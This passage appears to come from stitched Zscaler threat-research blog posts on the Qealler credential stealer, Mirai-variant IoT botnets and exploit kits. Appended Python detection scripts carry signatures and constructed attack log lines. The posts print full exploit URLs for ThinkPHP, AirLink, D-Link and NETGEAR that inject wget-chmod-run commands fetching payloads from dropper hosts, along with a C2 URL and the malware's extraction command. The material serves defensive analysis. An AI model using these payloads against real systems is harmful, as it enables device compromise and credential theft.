%USERPROFILE%\\CRC32(“2a890bc98aaf6c96f2054bb1eadc9848eb17633039e9e9ffd833104ce553fe9b”)\\CRC32(“qealler”)\\CRC32(“machine”)\\CRC32(“id”)\\CRC32(“d”)\\CRC32(“q”)
Equivalent to:
%USERPROFILE%\\a60fcc00\\bda431f8\\1505df84\\bf396750\\98dd4acc\\99de3ada
After the downloading and decryption steps are completed, the sample stores a decrypted copy of 83e7cdf9 and db2bf213 in the %TEMP% directory with the name “_.tmp”.
_502560701855008616300501457487639.tmp
_502562165489004300569223733573535.tmp
_502560701855008616300501457487639.tmp (/lib/7z) is again a JAR file that doesn’t have any Java code inside, but contains three PE files inside the libraries as shown in Fig 8.
Fig. 8: Content of _502560701855008616300501457487639.tmp (/lib/7z)
7za.exe is a repackaged version of 7-zip to ensure the malware executes successfully even if the user does not have it installed by default.
The 7-zip (7za.exe) and its modules (7za.dll, 7zxa.dll) will be extracted from 7z.jar by the main sample and saved in the %TEMP% directory with the name “7z_.exe” and “7z_.dll”.
7z_502574395484008643130462441900754.exe
7z_502567545558005642490654395727502.dll
7z_502579570140002751296504101539829.dll
After extraction, the 7-zip executable is called by the main sample with the following command-line options:
%TEMP%\\7z_502574395484008643130462441900754.exe x %TEMP%\\_502562165489004300569223733573535.tmp -o%TEMP% -p"bbb6fec5ebef0d936db0b031b7ab19b6" -mmt -aoa -y
The downloaded Qealler module _502562165489004300569223733573535.tmp (/lib/qealler) is a password-protected 7-Zip archive.
The above command will extract the Qealler module in the %TEMP% directory with the password: bbb6fec5ebef0d936db0b031b7ab19b6
-mmt: use multithreading mode
-aoa: set overwrite mode
-y: assume yes for all the prompts
The Qealler module is the key component of this malware.
The extracted Qealler module contains Python 2.7.12 with the installed packages to ensure the malware will execute even if the user does not have it installed by default.
Qealler also has a directory named QaZaqne, a custom version of the open source project LaZagne. LaZagne is used to retrieve many of the passwords stored on a local computer; QaZaqne has the same functionality, finding and stealing credentials of the most commonly used software from the local machine.
Fig. 9: Content of extracted _502562165489004300569223733573535.tmp (/lib/qealler)
After extraction, the main sample (Remittance.jar) executes a Python file of QaZagne (main.py) with the following option and takes the JSON output:
%TEMP%\\qealler\\python\\python.exe %TEMP%\qealler\qazaqne\main.py all
Fig. 10: Stealer functions in QaZaqne module
This will get the credentials of all the software shown in the figure below:
Fig. 11: Qealler steals credentials of the software in this table
The output of QaZaqne on an infected Windows machine is shown in Fig 12. It is in JSON format and contains the credentials of CoreFTP and the Windows Credential Manager. It always starts with #fs# and ends with #ff#.
Fig. 12: JSON output of QaZaqne module
The main sample parses this output, fetches the system information listed below, and encrypts it using AES-ECB with the key "bbb6fec5ebef0d93".
Fig. 13: Fetch and encrypt system info
The final information scraped from the infected machine before encryption is shown below.
Fig. 14: Scraped data from an infected machine
Here, machine_id is a unique ID generated from the system nanoTime, and uuid is an encrypted value stored in the synchronized file.
This output is encrypted and encoded with BASE64 and sent to the command-and-control (C2) server, whose URL is an encrypted value of the key “d7c363a2019dac744cf076e11433547a47907e2c2f781e2d1c8f59a40c57dd03” in a synchronized file.
C2 URL: hxxp://82.196.11[.]96:56636/qealler-reloaded/ping
Fig. 15: Data sent to C2
In the post headers, q-qealler-id is the encrypted machine ID and q-qealler-stub-id is the encrypted hash of the machine ID and system time.
The request body contains encrypted and encoded system information and stolen credentials.
If the C2 server is active and data is successfully sent to the server, it will respond with the encrypted status, which looks like the following after decryption:
{"status":"2000","message":"success","extended":[],"time":1548096059}
IOCs:
A sneak peek into recent IoT attacks
Since the Mirai botnet source code was leaked in 2016, it was inevitable that we’d see its variants being put to use in IoT threat campaigns. Apart from using brute-force techniques to attack IoT devices through various protocols, the botnet also seems to be leveraging vulnerabilities present in IoT devices to infect other IoT devices. These vulnerabilities are mostly in management frameworks and, by exploiting them, attackers are achieving remote code execution. This typically results in turning the infected device into a bot which in turn forms a bigger botnet army. In some cases, we also saw cryptominers as the final payload delivered in the IoT campaigns.
The Zscaler ThreatLabZ team has been actively tracking these IoT attacks and analyzing their behavior, exploits, and payloads. In this blog, we will summarize our observations about a few of the more prominent IoT attacks we observed.
The graph below shows the IoT attacks we detected over the last three months.
Fig. 1: Detection timeline of prominent IoT threats
We observed a significant spike in detection at the start of January 2019. The spike was due to the heavy adoption of the ThinkPHP exploit, which we’ll describe later in the report.
RIFT botnet
The RIFT botnet emerged in December 2018 and uses a variety of exploits to infect IoT devices. According to online sources, the botnet used 17 exploits. The table below includes some of the more prominent RIFT exploits and those that continue to be active.
Fig. 2: Observed active exploits used in RIFT attack
Most of the vulnerabilities exploited were Remote Code Execution (RCE) or command injection types. It was surprising to see WordPress-based web components in use on IoT devices. This indicates that the use of readily available frameworks in IoT devices is increasing because of their ease of integration.
The following are typical post-exploitation steps:
Download the payload using the "wget" command; the downloaded payload is a shell script or an ELF file
If the payload is a shell script, it downloads the ELF file according to the code inside it
Store the payload in the "/tmp" directory
Make the payload executable using the "chmod" command (chmod 777)
Run the payload from /tmp/
Let’s take a sneak peek into one of the exploits we observed in the RIFT attack.
CVE-2015-2280 – AirLink101 SkyIPCam1620W Wireless N MPEG4 3GPP network camera OS command execution vulnerability
There is an OS command injection vulnerability in “snwrite.cgi”. The OS command can be injected through the parameter “mac”. The exploit URL looks like the following:
/maker/snwrite.cgi?mac=1234;wget%20http:// 89.46.223.70/airlink[.]sh%20-O%20/tmp/666trapgod;chmod%20777%20/tmp/666trapgod;./tmp/666trapgod
Post successful exploitation of this vulnerability, the “wget” command downloads the shell script payload from the URL “hxxp://89[.]46[.]223[.]70/airlink.sh” and stores the payload using “-O” switch to “/tmp/666trapgod”. Later, it changes the permission of the shell script file to 777 (full permissions), which makes it executable and then runs it from its location in the “/tmp” directory.
Fig. 3: Malicious “airlink.sh” shell script
The "airlink.sh" script (stored as "66trapgod") downloads the final payload from the dropper server "89[.]46[.]223[.]70". It downloads payloads for all the *NIX and other firmware architectures, hoping that one of them suits the victim's architecture, and executes it. All the payloads are prefixed with the "rift" string. The targeted architectures are:
x86, arm, arm5, arm6, arm7, m68k, mips, mpsl, ppc, ppc-440fp, sh4, spc, x32, x64
Fig. 4: RIFT botnet (rift.x86) packed with UPX packer
The static analysis of the unpacked payload reveals its contents.
It contains a list of known default usernames and passwords of IoT devices.
Fig. 5: Usernames and passwords found in RIFT botnet
Various IoT exploits, a few of which are shown in the screenshot below (it also contains some of those listed in Fig. 2).
Fig. 6: Exploits in the RIFT botnet
Using these default credentials and exploits, the infected IoT device infects another device. There is also an interesting reference in the payload that refers to “OrkSec Gang.”
Fig. 7: OrkSec Gang reference
The following are the user-agents seen in this attack:
Dark
Rift/2.0
Sefa
Shaolin/1.0
Oof
ThinkPHP exploitation
On December 11, 2018, a remote code execution vulnerability in the ThinkPHP framework was reported. ThinkPHP is used predominantly in China. We believe ThinkPHP is also being incorporated into upcoming IoT devices for their management plugins. The exploit code is as follows:
/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp://orksecpatrol[.]xyz/bins/rift.x86;cat%20rift.x86%20>%20gfrihk;chmod%20777%20gfrihk;./gfrihk%20thinkphp;rm%20gfrihk
The OS commands are injected through the query parameter “vars”. This follows a typical exploitation sequence observed in RIFT attacks (as explained above). The payload was downloaded from the URL “hxxp://orksecpatrol[.]xyz/bins/rift.x86”, which is similar to what we saw in the case of RIFT. The payload downloaded from the ThinkPHP exploit also was packed with UPX and contains a list of well-known usernames and passwords. Similar exploits were also embedded in the binary that we saw in the RIFT botnet. The notable difference was that this payload now contains the ThinkPHP exploit. It appears that the RIFT attack incorporated this exploit into its arsenal.
Fig. 8: Inclusion of ThinkPHP exploit in RIFT botnet
There was one more difference: a couple of vulnerabilities exploited over the UPnP SOAP (CVE-2014-8361) protocol in Realtek SDK Miniigd was using the user-agent string “NotRift/2.0” instead of the previously used user-agent “Rift/2.0” string.
Fig. 9: Comparing UPnP exploits observed in RIFT and ThinkPHP payloads
It has become evident that the RIFT botnet is also being delivered through the ThinkPHP exploitation.
D-Link router exploitation
In addition to other targets, we saw major hits related to D-Link routers, especially the DSL-2750B model. This model has a Remote Code Execution (RCE) vulnerability that can be exploited through the "cli" parameter ("login.cgi?cli="). The parameter directly invokes the "ayecli" binary, and the value of the parameter becomes the input to that binary. Below is the observed exploit code:
/login.cgi?cli=aa aa';wget hxxp://89[.]46[.]223[.]70/dlink.sh -O -> /tmp/ff;chmod +x /tmp/ff;sh /tmp/ff'$
The URL downloads a shell script from “hxxp://89[.]46[.]223[.]70” and drops it into “/tmp/” directory with file name “ff”. We noticed that file names were totally random. Later, the file is made executable with the “chmod +x” command and is finally executed.
The shell script contains download links of additional payloads for different architectures.
Fig. 10: Malicious “dlink.sh” shell script
The task of the shell script is to remove all contents from the "/tmp/" directory, download the actual payload, make it executable, and finally execute it. It tries to download and execute payloads for many *NIX architectures, including but not limited to .arm, .arm5, .arm7, .mips, .mpsl and .x86. Once a payload has run, the script deletes all the payloads from the "/tmp/" directory, leaving no trace of the attack.
The payload dropped from the exploit was not packed, and a simple static analysis of the file showed reference to another famous UPnP SOAP exploit (CVE-2014-8361) in Realtek SDK Miniigd. This vulnerability affects all the IoT devices embedded with Realtek SDK. This Mirai variant tries to exploit all the other devices with the embedded exploit of Realtek SDK Miniigd.
Fig. 11: Realtek SDK Miniigd exploit – CVE-2014-8361
Shaolin botnet (exploitation of NETGEAR vulnerability)
In the first week of January 2019, we saw hits targeting NETGEAR routers. In these attacks, an old bug was being used for Remote Code Execution (RCE). NETGEAR DGN2200 and NETGEAR DGN1000 are vulnerable to this bug.
We saw similar patterns in the URL below, where attackers were trying to download additional payloads from external locations. The exploit code is as follows:
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm -rf /tmp/*;wget hxxp://145[.]239[.]138[.]69/bins/shaolin.mips -O /tmp/netgear;sh netgear&curpath=/¤tsetting.htm=1
The downloaded payload “shaolin.mips” is named “netgear” and is executed directly after download. This payload is similar to what we saw in the Airlink101 SkyIPCam case described earlier and used multiple exploits. We found it to be using the SOAP exploit, which targets DSL modems as shown in the code snippet below:
Fig. 12: SOAP exploit targeting DSL modems
The payload also tries to exploit the Home Network Administration Protocol (HNAP) in D-Link routers to download additional payloads. The following snippet was fetched from a payload that shows usage of HNAP.
Fig. 13: HNAP exploit targeting D-Link routers
In addition, we found many embedded usernames and passwords, similar to what we saw in the AirLink case.
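As an added example (not code from the original post), the following Python scans web-server access log lines for the four request shapes described in this post (ThinkPHP invokefunction, AirLink snwrite.cgi, D-Link login.cgi?cli=, NETGEAR setup.cgi todo=syscmd), the shared download-chmod-run stager pattern, and the user-agent strings listed above. The log lines are constructed; the addresses and the "dropper.example" host are placeholders.

```python
import re
from urllib.parse import unquote

# Constructed access log lines (combined format) mirroring the requests described
# in this post; addresses and hosts are placeholders, not real IOCs.
SAMPLE_LOG = [
    r'203.0.113.5 - - [10/Jan/2019:10:00:01 +0000] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://dropper.example/bins/rift.x86;chmod%20777%20rift.x86;./rift.x86 HTTP/1.1" 200 0 "-" "Rift/2.0"',
    r'203.0.113.6 - - [10/Jan/2019:10:00:02 +0000] "GET /maker/snwrite.cgi?mac=1234;wget%20http://dropper.example/airlink.sh%20-O%20/tmp/x;chmod%20777%20/tmp/x;/tmp/x HTTP/1.1" 404 0 "-" "Dark"',
    r'203.0.113.7 - - [10/Jan/2019:10:00:03 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://dropper.example/dlink.sh%20-O%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27 HTTP/1.1" 200 0 "-" "Shaolin/1.0"',
    r'203.0.113.8 - - [10/Jan/2019:10:00:04 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm%20-rf%20/tmp/*;wget%20http://dropper.example/bins/shaolin.mips%20-O%20/tmp/netgear;sh%20netgear&curpath=/&currentsetting.htm=1 HTTP/1.1" 200 0 "-" "Sefa"',
    r'198.51.100.9 - - [10/Jan/2019:10:01:00 +0000] "GET /setup.cgi?next_file=status.htm HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    r'198.51.100.10 - - [10/Jan/2019:10:01:05 +0000] "GET /public/index.php?s=/index/user/login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Exploit-specific signatures, matched against the URL-decoded request path.
SIGNATURES = [
    ("thinkphp_invokefunction_rce", re.compile(r"\\think\\app/invokefunction.*call_user_func_array", re.I)),
    ("airlink_snwrite_mac_cmdi", re.compile(r"/snwrite\.cgi\?.*\bmac=[^&]*;", re.I)),
    ("dlink_login_cli_rce", re.compile(r"/login\.cgi\?.*\bcli=.*;", re.I)),
    ("netgear_setup_syscmd", re.compile(r"/setup\.cgi\?.*\btodo=syscmd\b", re.I)),
]
# Generic stager shape shared by all four: separator, download tool, then chmod or /tmp.
STAGER_RX = re.compile(r";\s*(?:wget|curl|tftp)\b.*(?:chmod|/tmp/)", re.I)
# User-agent strings listed in the post for RIFT/ThinkPHP/Shaolin traffic.
KNOWN_UAS = {"Dark", "Rift/2.0", "NotRift/2.0", "Sefa", "Shaolin/1.0", "Oof"}


def analyze(line):
    """Parse one log line; return a verdict dict, or None if the line does not parse."""
    m = LOG_RX.match(line)
    if not m:
        return None
    path = unquote(m.group("path"))       # decode %20 etc. before matching
    sigs = [name for name, rx in SIGNATURES if rx.search(path)]
    stager = bool(STAGER_RX.search(path))
    ua_known = m.group("ua") in KNOWN_UAS
    if sigs:
        verdict = "exploit"
    elif stager or ua_known:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"ip": m.group("ip"), "ua": m.group("ua"), "signatures": sigs,
            "stager": stager, "ua_known": ua_known, "verdict": verdict}


def scan(lines):
    """Analyze every parseable line, preserving order."""
    return [r for r in map(analyze, lines) if r is not None]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(f"{r['ip']:14s} {r['verdict']:10s} {r['signatures']} stager={r['stager']} ua={r['ua']}")
```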
Conclusion
The IoT space is evolving, and so is the attack surface of these devices. IoT devices need to be patched on a timely basis, which presents a challenge. IoT devices also need to be updated regularly. Even though techniques like brute-force attacks that use default passwords are not new, they remain effective because device passwords tend to go unchanged following installation. By hardening IoT devices and baking security in, many of the attacks we’ve been seeing can be countered.
Zscaler detections
IoT.Backdoor.RIFT
PHP.Exploit.ThinkPHP
IoT.Trojan.Mirai.B
IoT.Exploit.NetGear
Indicators of Compromise (IOCs)
Top Exploit Kit Activity Roundup – Winter 2019
This is the ninth in a series of quarterly roundups by Zscaler ThreatLabZ researchers, in which the team collects and analyzes the recent activity of current exploit kits. Exploit kits (EKs) are rapidly deployable software packages designed to leverage vulnerabilities in web browsers and deliver a malicious payload to a victim’s computer. Authors of EKs offer their services for a fee, distributing malware for other malicious actors. What follows are highlights from the EK activity we observed during the last quarter.
RIG EK
RIG EK has been the most active exploit kit in the past, but its activity has decreased in comparison to previous quarters. We saw various payloads delivered by RIG EK, from ransomware to banking Trojans. The graph below shows the hits representing RIG EK activity.
Figure 1: RIG EK hits from 15th October 2018 to 15th January 2019
The geographic distribution for RIG EK hits is shown below.
Figure 2: RIG EK heat map showing infected regions
One instance of the RIG EK cycle is shown in the figure below.
Figure 3: RIG EK infection cycle
The obfuscated JavaScript on the landing page can be seen below.
Figure 4: RIG EK landing page, obfuscated JavaScript
We observed the use of CVE-2018-8174, which targets a VBScript engine to attack the victim's machine. A Flash-based exploit, CVE-2018-4878, was also used, affecting Adobe Flash version 28.0.0.137 and earlier versions.
Decompiling the Flash file, we can see the CVE-2018-4878 code, shown below.
Figure 5: Decompiled Flash exploit in the current RIG EK cycle; CVE-2018-4878
We can see that the threat actors have tried to mask the function names, which were still visible last quarter, as shown in the screenshot below.
Figure 6: Decompiled Flash exploit in previous quarter RIG EK cycle; CVE-2018-4878
Different payloads were observed during the quarter, with GandCrab ransomware being served at the start of the quarter and Trojans being served towards the end.
GrandSoft EK
GrandSoft EK is an older exploit kit that has shown renewed activity recently. It is served through malvertising redirects.
Figure 7: GrandSoft EK hits from 15th October 2018 to 15th January 2019
The geographical distribution of GrandSoft hits can be seen below.
Figure 8: GrandSoft EK heat map shows infected regions, primarily in Asia
The threat actors make small changes to the URL pattern between cycles, as shown in the two images below: the same path token appears as "getversionpd" in one cycle and as "getversoinpd" (two characters transposed) in the other, enough to slip past a signature that matches the token literally.
Figure 9: GrandSoft EK Cycle with URL "getversionpd"
Figure 10: GrandSoft EK cycle with the URL "getversoinpd"
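A signature that matches the GrandSoft path token literally is defeated by the one-character edits shown above. The following is an added example (not code from the original post or from Zscaler) of a URL check that tolerates such edits: it scores every path token against a list of known EK tokens with optimal string alignment distance, which counts an adjacent transposition such as "io" to "oi" as a single edit. The hostnames and paths in the sample URLs are constructed; only the token "getversionpd" comes from the post.

```python
"""Fuzzy matching of a known exploit-kit URL path token.

Added example, not part of the original post or of any Zscaler tooling.
Assumes the defender keeps a list of path tokens seen in GrandSoft EK
cycles ("getversionpd" is from the post) and wants a check that still
fires on small edits such as "getversoinpd". Sample URLs are constructed.
"""
from urllib.parse import urlparse

# Token observed in the GrandSoft cycle shown in the post.
KNOWN_TOKENS = ["getversionpd"]


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein edits plus adjacent
    transposition, so 'getversionpd' -> 'getversoinpd' costs 1, not 2."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[len(a)][len(b)]


def path_tokens(url: str):
    """Split the URL path into its non-empty segments."""
    return [t for t in urlparse(url).path.split("/") if t]


def match_url(url: str, max_distance: int = 1):
    """Return (token, known_token, distance) for the closest path token
    within max_distance of a known EK token, or None if nothing matches."""
    best = None
    for tok in path_tokens(url):
        for known in KNOWN_TOKENS:
            dist = osa_distance(tok.lower(), known)
            if dist <= max_distance and (best is None or dist < best[2]):
                best = (tok, known, dist)
    return best


# Constructed sample URLs (hosts under the reserved .invalid TLD).
SAMPLE_URLS = [
    "http://ek-sample.invalid/getversionpd/3f9a",    # exact token
    "http://ek-sample.invalid/getversoinpd/3f9a",    # transposition, distance 1
    "http://ek-sample.invalid/getversionpd2/3f9a",   # one insertion, distance 1
    "http://benign.invalid/getversion/latest",       # distance 2, not flagged
    "http://benign.invalid/index.html",
]


def scan(urls):
    """Return (url, match) pairs for every URL carrying a near-known token."""
    hits = []
    for u in urls:
        m = match_url(u)
        if m:
            hits.append((u, m))
    return hits


if __name__ == "__main__":
    for url, (tok, known, dist) in scan(SAMPLE_URLS):
        print(f"{url}: token '{tok}' is {dist} edit(s) from '{known}'")
```

The threshold of one edit is safe for a twelve-character token; for shorter known tokens the same distance would produce false positives on ordinary paths, so scale the allowed distance to the token length or require a minimum token length before applying the fuzzy check.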
We saw no changes in the landing page, which still exploits CVE-2016-0189, a memory corruption vulnerability in the VBScript engine of Internet Explorer, to compromise the victim. A snippet of the GrandSoft EK landing page is shown below.
Figure 11: GrandSoft EK landing page
The payloads we observed were password stealers and Trojans, including AZORult, rather than the GandCrab ransomware we saw in previous quarters.
Fallout EK
Fallout EK is relatively new, having shown activity since early last quarter. Victims, who are mainly reached through malvertising campaigns, are passed through a chain of HTTP 302 redirects before arriving at the Fallout EK landing page.
Figure 12: Fallout EK hits from 15th October 2018 to 15th January 2019
The geographic distribution for the Fallout EK is shown below.
Figure 13: Fallout EK heat map shows infected regions
We can see one instance of a Fallout EK chain in the figure below.
Figure 14: Fallout EK infection cycle
We can see the initial HTTP 302 redirects from 185.231.69[.]225 and 51.15.98[.]59, which lead to the Fallout EK landing page.
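Because Fallout reaches its landing page through several 302 hops, an analyst working from proxy logs rather than a packet capture has to stitch the chain back together. The following is an added example (not code from the original post or from Zscaler's products) that does this: it follows each 302's Location header to the next request from the same client within a short time window and reports chains with two or more redirect hops. The log format is a constructed one (epoch, client IP, status, URL, Location or "-"); the two redirector IPs are the ones named above, written without defanging as they would appear in a log, while the paths and the landing-page host are constructed.

```python
"""Reconstruct HTTP 302 redirect chains from a web proxy log.

Added example, not part of the original post or of any Zscaler product.
Assumes a constructed log format with one request per line:
    <epoch> <client_ip> <status> <url> <location-or-'-'>
The redirector IPs are the ones named in the post; the paths and the
landing-page host are constructed sample data.
"""
from urllib.parse import urljoin, urlparse

# Constructed sample log: a malvertising click bounced through two 302s
# to a landing page, plus an unrelated single redirect from another client.
SAMPLE_LOG = """\
1547000000 10.0.0.5 200 http://ad-network.invalid/click?id=77 -
1547000001 10.0.0.5 302 http://185.231.69.225/track/77 http://51.15.98.59/go?c=77
1547000001 10.0.0.5 302 http://51.15.98.59/go?c=77 http://landing.invalid/index.php?k=abc
1547000002 10.0.0.5 200 http://landing.invalid/index.php?k=abc -
1547000002 10.0.0.6 302 http://shop.invalid/old /new
1547000003 10.0.0.6 200 http://shop.invalid/new -
"""


def parse_log(text):
    """Parse the constructed log format into a list of request dicts."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, status, url, loc = line.split(maxsplit=4)
        rows.append({"ts": int(ts), "client": client, "status": int(status),
                     "url": url, "location": None if loc == "-" else loc})
    return rows


def build_chains(rows, window=5):
    """Follow each 302's Location to the next request for that URL by the
    same client within `window` seconds. Returns one URL list per chain.
    A relative Location is resolved against the redirecting URL."""
    by_client = {}
    for r in rows:
        by_client.setdefault(r["client"], []).append(r)
    chains = []
    for reqs in by_client.values():
        reqs.sort(key=lambda r: r["ts"])          # stable: keeps log order for ties
        consumed = set()                          # indexes already used as hops
        for i, r in enumerate(reqs):
            if i in consumed or r["status"] != 302:
                continue
            chain = [r["url"]]
            cur, idx = r, i
            while cur["status"] == 302 and cur["location"]:
                target = urljoin(cur["url"], cur["location"])
                nxt = next((j for j in range(idx + 1, len(reqs))
                            if j not in consumed and reqs[j]["url"] == target
                            and reqs[j]["ts"] - cur["ts"] <= window), None)
                if nxt is None:
                    chain.append(target)          # target never fetched; record it anyway
                    break
                consumed.add(nxt)
                chain.append(reqs[nxt]["url"])
                cur, idx = reqs[nxt], nxt
            chains.append(chain)
    return chains


def hop_hosts(chain):
    """Hostnames along a chain, handy for pivoting on redirector infrastructure."""
    return [urlparse(u).hostname for u in chain]


def suspicious_chains(chains, min_redirects=2):
    """Chains with at least `min_redirects` 302 hops (min_redirects + 1 URLs)
    are the multi-hop pattern described for Fallout and deserve review."""
    return [c for c in chains if len(c) > min_redirects]


if __name__ == "__main__":
    for chain in suspicious_chains(build_chains(parse_log(SAMPLE_LOG))):
        print(" -> ".join(hop_hosts(chain)))
```

Matching on the exact target URL is deliberate: it avoids joining unrelated requests that merely share a host. In a real log you would also want to carry the Referer of the first hop (the ad network) into the chain, since that is the lead for a takedown request.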
The screenshot of the obfuscated landing page is shown below.
Figure 15: Fallout EK landing page
The payload seen with the Fallout EK was GandCrab ransomware.
Figure 16: GandCrab ransomware infection through Fallout EK
Other exploit kits
We observed Magnitude EK activity in Southeast Asia, but other exploit kits such as Terror EK, Disdain EK, and Kaixin EK are no longer showing any activity. Underminer EK was seen in past quarters, but we did not observe a full infection cycle for it in the current quarter.
Conclusion
Exploit kits can infect a victim's machine during web browsing without the user’s knowledge. The attackers monetize successful infections by collecting a ransom for retrieving data encrypted by ransomware, mining cryptocurrencies using the victim's system resources, or installing Trojans to steal a victim’s identity. Attackers frequently change their techniques by obfuscating the source code or integrating new exploit code into their EK, and security researchers analyze and block the new threats by tracking changes in the EK behavior.
To help avoid infections from exploit kits, users should always block untrusted third-party scripts and resources, and avoid clicking on suspicious advertisements. Keeping browser plugins and web browsers up to date with the latest patches helps to protect against common vulnerabilities targeted by exploit kits. The Zscaler ThreatLabZ research team has confirmed coverage for these top exploit kits and subsequent payloads, ensuring protection for organizations using the Zscaler cloud security platform.
